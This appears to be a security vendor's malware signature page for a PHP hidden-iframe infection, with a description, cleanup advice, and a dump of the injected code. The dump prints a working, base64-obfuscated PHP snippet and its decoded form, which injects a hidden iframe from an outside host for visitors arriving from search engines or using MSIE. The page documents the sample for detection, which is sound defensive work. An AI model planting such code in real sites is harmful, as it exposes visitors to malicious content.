Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.malware.hidden-iframe

php.malware.hidden-iframe

PHP malware is one of the most commom malicious code found on the internet, mostly because it is the leading server-side language used on websites,
followed by ASP, Java, ColdFusion and Perl (source).
One of the most common uses of PHP in malware is obfuscating malicious content in files on server and activating it under certain conditions only.
For example, instead of injecting malicious iframe code verbatim, hackers prefer add a PHP code that obfuscates iframe injection and make it only injected when
visitors come to a site for the first time, or come from search engines and social networks.

Affecting

Any vulnerable PHP based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your site's files looking for suspicious code or files that you don't recognize. Also you can sign up with us and let our team remove the malware for you.

Dump

Example of original code

<?php if(preg_match(base64_decode('Lyh5YW5kZXh8Z29vZ2xlfHlhaG9vfGJpbmd8ZG1venxhb2x8YXNrfGFsdGF2aXN0YXxseWNvcykvaQ=='),getenv(base64_decode('SFRUUF9SRUZFUkVS')))or preg_match(base64_decode('Lyhtc2llKS9p'),getenv(base64_decode('SFRUUF9VU0VSX0FHRU5U'))))echo base64_decode('PGlmcmFtZSB3aWR0aD0iMTUiIGhlaWdodD0iMTUiIGZyYW1lYm9yZGVyPSIwIiBzY3JvbGxpbmc9Im5vIiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7IiBzcmM9Imh0dHA6Ly9nYWdsZS51cy8/c29mIj48L2lmcmFtZT4=');?>

Deobfuscated

<?php if(preg_match('/(yandex|google|yahoo|bing|dmoz|aol|ask|altavista|lycos)/i',getenv('HTTP_REFERER'))or preg_match('/(msie)/i',getenv('HTTP_USER_AGENT')))
echo '<iframe width="15" height="15" frameborder="0" scrolling="no" style="position:absolute;" src="http://gagle.us/?sof"></iframe>';?>